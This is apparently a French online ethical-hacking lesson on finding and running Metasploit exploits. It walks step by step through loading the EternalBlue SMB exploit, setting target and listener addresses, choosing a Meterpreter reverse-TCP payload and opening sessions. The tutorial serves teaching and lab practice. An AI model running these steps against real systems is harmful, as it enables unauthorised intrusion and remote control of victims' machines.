Rechercher et utiliser des exploits
Trouver et exécuter
Rechercher et utiliser des exploits est une leçon Ethical Hacking Academy gratuite sur CoddyKit. Ceci est la leçon 2 sur 4. Tu peux lire la leçon complète ci-dessous gratuitement — puis la pratiquer en direct dans le navigateur avec un éditeur de code intégré et un tuteur IA 24/7. Elle fait partie du parcours d'apprentissage Ethical Hacking Academy, et ta progression se synchronise sur le web et l'application CoddyKit. Le cours Ethical Hacking Academy comprend 4 leçons au total.
De la reconnaissance à l’exploitation
Après l’analyse, vous connaissez les services et les versions de la cible. L’étape suivante consiste à trouver un module d’exploitation correspondant à une vulnérabilité connue de ces versions.
La commande search de Metasploit vous donne accès à des milliers de modules. Une recherche précise fait gagner du temps et évite d’exécuter le mauvais code.
Recherche de base
La commande search interroge l’index des modules à l’aide d’un mot-clé. Vous pouvez effectuer une recherche par nom de logiciel, par CVE ou par service.
search eternalblue
search type:exploit platform:windows smbFiltres de recherche
Affinez les résultats à l’aide de filtres :
- type: exploit, auxiliary, post.
- platform: windows, linux, unix.
- cve: un identifiant CVE précis.
- rank: excellent, great, good (fiabilité).
La combinaison de filtres réduit rapidement des milliers de modules à une poignée de résultats.
search cve:2017-0144 type:exploitLire les résultats de recherche
Les résultats de recherche présentent chaque module avec un rang, une date de divulgation et un indicateur check. Le rang reflète la fiabilité et la sécurité de l’exploit.
- excellent : risque faible de faire planter la cible.
- great/good : fiable dans les conditions courantes.
- low/manual : risqué ou nécessitant une configuration soigneuse.
Privilégiez les modules mieux classés afin d’éviter de faire tomber des systèmes de production.
Chargement d’un module
Utilisez le numéro d’index du module ou son chemin complet avec use. L’invite change pour afficher le module chargé, et le magasin de données contient désormais les options de ce module.
use exploit/windows/smb/ms17_010_eternalblue
# msf6 exploit(windows/smb/ms17_010_eternalblue) >Inspection du module
Avant de l’exécuter, renseignez-vous sur le module. info affiche la description, les références (CVE, avis de sécurité), les options requises et les cibles prises en charge.
Comprendre ce que fait un module fait partie d’un usage professionnel et responsable : ne lancez jamais un exploit que vous ne comprenez pas.
info
show options
show targetsConfiguration des options
Configurez les options requises avec set. Pour un exploit distant, les options courantes sont l’adresse de la cible et les paramètres de votre charge utile.
set RHOSTS 10.10.10.40
set RPORT 445
set LHOST 10.10.14.2La commande check
De nombreux exploits prennent en charge check, qui vérifie en toute sécurité si la cible semble vulnérable sans l’exploiter réellement.
Exécuter check en premier est une bonne pratique : cela réduit le risque de faire tomber un système et confirme que vous êtes sur le point de consacrer des efforts à une véritable opportunité.
check
# [+] 10.10.10.40:445 - The target is vulnerable.Choix de la charge utile
Un exploit a besoin d’une charge utile. Metasploit en sélectionne une par défaut, mais vous pouvez afficher la liste et en choisir une adaptée à la cible et à vos besoins d’accès.
show payloads
set PAYLOAD windows/x64/meterpreter/reverse_tcpExécution et sessions
Lancez l’exécution avec exploit (ou run). En cas de réussite, vous obtenez une session, c’est-à-dire une connexion interactive à la cible.
Gérez plusieurs sessions avec sessions -l pour les lister et sessions -i N pour interagir avec l’une d’elles. Mettez une session en arrière-plan avec background pour continuer à travailler dans la console.
exploit
sessions -l
sessions -i 1Options globales et options du module
Certains paramètres, comme LHOST, sont réutilisés dans de nombreux modules. Définissez-les globalement avec setg pour ne pas avoir à les saisir de nouveau chaque fois que vous changez de module.
set: s’applique uniquement au module actuel.setg: s’applique globalement à tous les modules.unsetg: efface une valeur globale.
Cela vous fait gagner du temps lors de longues interventions faisant appel à de nombreux modules.
setg LHOST 10.10.14.2
setg RHOSTS 10.10.10.40Vérification rapide
Choisissez l’étape responsable à effectuer avant de lancer un exploit.
Récapitulatif
Vous avez appris à trouver et à exécuter des exploits :
- Utiliser search avec des filtres (type, plateforme, cve, rang) pour trouver des modules.
- Privilégier les modules de rank élevé pour gagner en fiabilité et en sécurité.
- Utiliser use pour charger, info/show options pour inspecter et set pour configurer.
- Exécuter d’abord check, puis exploit pour obtenir une session.
- Gérer les sessions avec sessions -l/-i.
Ensuite : les charges utiles et l’interpréteur post-exploitation Meterpreter.
Questions Fréquemment Posées
La leçon « Rechercher et utiliser des exploits » est-elle gratuite ?
Oui — le texte complet de « Rechercher et utiliser des exploits » est gratuit à lire ici sur le web. Pour la pratiquer de manière interactive (un éditeur de code intégré et un tuteur IA 24/7) et déverrouiller le reste du cours Ethical Hacking Academy, passe à CoddyKit PRO. Le cours Ethical Hacking Academy comprend 4 leçons au total.
Qu'est-ce que j'apprendrai dans « Rechercher et utiliser des exploits » ?
Trouver et exécuter Tu pratiques Ethical Hacking Academy avec du code pratique que tu exécutes directement dans le navigateur, et un tuteur IA 24/7 répond à tes questions au fur et à mesure que tu avances dans la leçon.
Dois-je avoir de l'expérience pour commencer Ethical Hacking Academy ?
Aucune expérience préalable n'est requise. Ethical Hacking Academy sur CoddyKit est structuré pour les débutants jusqu'aux apprenants avancés, donc tu peux commencer ici ou depuis le début et avancer à ton rythme. Ceci est la leçon 2 sur 4.
Combien de temps prend la leçon « Rechercher et utiliser des exploits » ?
La plupart des leçons CoddyKit prennent environ 5–10 minutes. Chacune est courte et interactive, tu progresses régulièrement et tu repiques exactement où tu t'es arrêté sur le web et l'app.
Peux-tu écrire et exécuter du code dans cette leçon Ethical Hacking Academy ?
Oui. Chaque leçon Ethical Hacking Academy inclut un éditeur de code intégré, tu écris et exécutes du vrai code directement dans ton navigateur et tu reçois des retours IA instantanés — aucune configuration locale requise.
Toutes les leçons de ce cours
- Architecture de Metasploit
- Rechercher et utiliser des exploits
- Charges utiles et Meterpreter
- Modules post-exploitation